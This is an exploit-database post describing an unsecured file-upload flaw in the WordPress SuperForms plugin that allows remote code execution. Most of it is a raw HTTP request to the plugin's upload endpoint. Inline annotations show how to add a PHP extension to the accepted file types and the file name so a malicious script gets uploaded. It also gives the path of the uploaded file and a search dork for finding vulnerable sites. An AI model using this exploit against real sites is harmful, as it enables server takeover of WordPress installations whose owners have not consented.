Wordpress [SuperForms] Plugin Unsecured File Upload leads to remote code execution

2021.01.29

ABDO10 (DZ)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:"/wp-content/plugins/super-forms/"

# Founder : ABDO10_DZ
# Date : Jan - 28 - 2021
# Exploit Title : SuperForms Unsecured file upload end point to remote code execution  

# data in http request :

POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1              <=== exploit end point 
Host: www.xxxxxxxxx.com
User-Agent: UserAgent
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------423513681827540048931513055996
Content-Length: 7058
Origin: https://www.xxxxxxxxxxxxx.com
Connection: close
Referer: https://www.xxxxxxxxxxx.com/employment/
Cookie: __cfduid=d7e3b556f16169a6357e2aa093b5d601f1611788435; tk_or=%22https%3A%2F%2Fwww.google.com%2F%22; tk_r3d=%22https%3A%2F%2Fwww.google.com%2F%22; tk_lr=%22https%3A%2F%2Fwww.google.com%2F%22; _ga=GA1.2.442473993.1611788453; _gid=GA1.2.1679998212.1611788453; super_session=0462c61b4dd8b5a4de7ba4407a4c0bd2%7C%7C1611790252%7C%7C1611789892; __hstc=31457313.daaedaaf15ff8afaa2713b5d9245943b.1611788454461.1611788454461.1611788454461.1; hubspotutk=daaedaaf15ff8afaa2713b5d9245943b; __hssrc=1; __hssc=31457313.5.1611788454462; cpsession=%3a3J_YLDdMLiiFkAis%2c0e16089efa7b3924ed5633fd09018e6c; timezone=America/Los_Angeles

-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="accept_file_types"

jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF                        <======= inject extension (|PHP4) to validate file to upload
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="max_file_size"

8000000
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="image_library"

0
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="files[]"; filename="filename.(extension)"    <====   inject code extension (.php4) for example
Content-Type: application/pdf

Evil codes to be uploaded 

-----------------------------423513681827540048931513055996--

# Uploaded Malicious File can  be Found in : /wp-content/uploads/superforms/2021/01/<id>/filename.php4
u can get <id> from server reply . 

# Zkara f Scammers w Spammers dyal ZaB

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Wordpress [SuperForms] Plugin Unsecured File Upload leads to remote code execution

Dork: inurl:"/wp-content/plugins/super-forms/"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.